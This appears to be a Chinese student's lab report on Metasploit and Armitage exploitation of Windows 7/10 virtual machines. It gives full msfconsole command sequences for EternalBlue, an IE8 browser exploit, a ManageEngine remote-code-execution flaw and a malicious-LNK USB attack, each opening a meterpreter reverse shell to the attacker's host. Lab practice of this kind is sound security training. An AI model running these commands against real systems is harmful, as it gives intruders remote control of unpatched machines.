- 一、知识点总结
- 二、攻击实例
-
- 主动攻击的实践
ms08_067(win7)
payload/generic/shell_reverse_tcp
(失败)payload/windows/meterpreter/reverse_tcp
(失败)
ms17_010_eternalblue(win7)
payload/windows/x64/meterpreter/reverse_tcp
(成功)
- 攻击浏览器的实践
ms11_050(win7)
(成功)
ms14_064(win7)
exploit/windows/browser/ms14_064_ole_code_execution (失败)
- 攻击客户端的实践
- ManageEngine Applications Manager 13.5远程代码执行漏洞 (CVE-2018-7890)
- manageengine_appmanager_exec (成功且唯一)
- ManageEngine Applications Manager 13.5远程代码执行漏洞 (CVE-2018-7890)
- 成功应用任何一个辅助模块
- usb fileforma (成功)
- 主动攻击的实践
- 三、实验总结
一、知识点总结
1.MSF攻击方法
- 主动攻击:扫描主机漏洞,进行攻击
- 攻击浏览器
- 攻击其他客户端
2.MSF的六种模块
-
渗透攻击模块
Exploit Modules
:攻击漏洞,把shellcode
"背"过去- 主动渗透攻击:攻击某个系统服务
- 被动渗透攻击:攻击某个客户端应用
-
辅助模块
Auxiliary Modules
:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提攻击载荷Payload Modules
:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码- 网络服务的扫描与查点
- 探查敏感信息泄露、Fuzz测试发掘漏洞
- 收集登录密码
-
空字段模块
Nop Modules
- 一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)
- 由于系统无法精确计算
shellcode
的起始地址,所以加入nops
以增加攻击成功的概率
-
编码模块
Encoders
后渗透攻击模块Post
:攻击成功之后,动态传输代码使其在被控机执行- 改变
payload
形状,使得不出现特定字符 - 确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”
- 改变
-
查看六种模块源码目录
/usr/share/metasploit-framework/modules
3.MSF的三种用户操作界面
-
msfconsole
- 查看模块的具体信息
info [exploits|auxiliary|post|payloads|encoders|nops]
- 查看设置信息
show [options]
- 查看攻击目标类型
show [target]
- 查找命令
search
- 查找2016年产生的在windows平台下的漏洞
search ms16 type:exploit platform:windows
- 查找2016年产生的在windows平台下的漏洞
- 查看模块的具体信息
-
armitagewebgui
-
启动服务器
service postgresql start
-
启动armitage
armitage
-
二、攻击实例
没实现ms08_067
靶机:Microsoft Windows 7
payload : generic/shell_reverse_tcp
实验步骤
通过菜单栏图标直接打开Armitag
根据已知信息推导出目标主机所在网段的IP,扫描目标网段完整信息,确认目标网络拓扑结构以实施网络侦查。依次选择Hosts->Nmap Scan->Quick Scan(OS detect)
虚拟机所在网段位192.168.80.0/24
Win10虚拟机IP信息
扫描后得到网段中4个虚拟机包括主机
选中靶机192.168.80.137,右键选择Services,查看靶机上开启的服务:
选中靶机192.168.80.137,右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据
可见类似前几次实验在Metasploit中手动配置主机号、端口号等设置现在统统直接自动化了!
利用上一步中漏洞扫描得到的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中靶机192.168.80.137,依次选择菜单栏Attacks->Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块:
在利用Armitage完成对靶机的攻击模块自动化搜索以后,选中192.168.80.137机右键可以发现多了Attack菜单。依次选择Attack->smb->ms08_067_netapi菜单,选择smb漏洞下的ms08_067漏洞对WIN7靶机进行攻击(也可以在Armitage左侧树型目录下依次选择exploit->windows->smb->ms08_067_netapi找到该漏洞):
launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
为啥???然后我去看了一下适用系统,没有win7我哭了,我之前在做啥子?
实现MS17_010_eternalblue
靶机:Microsoft Windows 7
payload :windows/meterpreter/reverse_tcp
实验步骤
依然铁头娃,这次手动配置(肯定是能成功的)
1 use auxiliary/scanner/smb/smb_ms17_010 2 set RHOST 192.168.80.141 3 Run 4 Back 5 search ms17_010 6 use exploit/windows/smb/ms17_010_eternalblue 7 set RHOST 192.168.80.141 8 show options 9 set payload windows/meterpreter/reverse_tcp 10 set LHOST 192.168.80.130 11 run
实现ms11_050
靶机:Microsoft Windows 7 + IE8
payload : windows/meterpreter/reverse_tcp
实验步骤
1 search ms11_050 2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 3 set srvhost 192.168.80.130 4 set payload windows/meterpreter/reverse_tcp 5 set LHOST 192.168.80.130 6 show targets 7 set target 4 8 Run 9 http://192.168.80.130:8080/zrCOkaFC
实现CVE-2018-7890
靶机:Windows 10
实现这一攻击需要ManageEngine Applications Manager 13.5,网上有相关警报书
网络上通用版本为13.5(试用版30天),实际上不怎么好用。。。只需要启动验证服务,但也不是每次都能成功地 (我也试了半天才成功,成功之后电脑蓝屏我还没快照 o(╥﹏╥)o)
1 use exploit/windows/http/manageengine_appmanager_exec 2 show options 3 set RHOST 192.168.80.136 4 Set RPORT 6305 5 set LHOST 192.168.80.130 6 set payload windows/meterpreter/reverse_tcp 7 exploit
虽然显示的是13版本,但安装的时候显示的13.5安装.......我也不知道怎么回事可能不显示之后的版本号吧
实现CVE-2017-8464
攻击靶机:Win7
1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.80.130 4 exploit 5 cp -r /root/.msf4/local/ /media/root/KINGSTON 6 use multi/handler 7 set paylaod windows/meterpreter/reverse_tcp 8 set LHOST 192.168.80.130 9 Exploit
这里要注意系统要开启U盘自动播放,如果没开启双击第一个文件就行
实验感想
做攻击之前,要看看攻击对当前版本是否可行,避免出现铁头娃现象。对于不同的攻击,可能有一次不行之后就成功的现象,要多次尝试分析其中的原因才能进行判断。由于我的实验中基本使用win7和win10,所以大部分早起漏洞都修补了,找新漏洞就有些困难,尤其是win10找了半天才试出来一个,幸好那个漏洞软件公司没有修补,要不再找一个唯一还会花很长时间。
原文地址:https://www.cnblogs.com/zui-luo/p/10734877.html